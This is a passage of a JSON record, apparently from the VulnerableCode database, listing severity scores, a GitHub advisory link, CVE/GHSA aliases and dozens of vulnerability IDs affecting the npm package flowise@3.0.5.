                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:54:28Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api",
                    "purl": "pkg:npm/flowise@3.0.5",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5hdy-fsnn-qfgq"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-6wat-8akx-hycz"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-8vsg-mxay-gkf7"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fje6-knjc-nfgf"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-g7y6-euhd-jqhh"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-n77p-4nu7-2yb4"
                        },
                        {
                            "vulnerability": "VCID-pg5c-6y4s-h3cq"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-t839-eydz-1ud4"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-wt2v-e5sa-n3g8"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zbrd-qdty-2bfs"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5"
                }
            ],
            "aliases": [
                "CVE-2025-29192",
                "GHSA-7r4h-vmj9-wg42"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wg28-w8vn-ybb5"
        }
    ],
    "risk_score": "4.5",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5"
}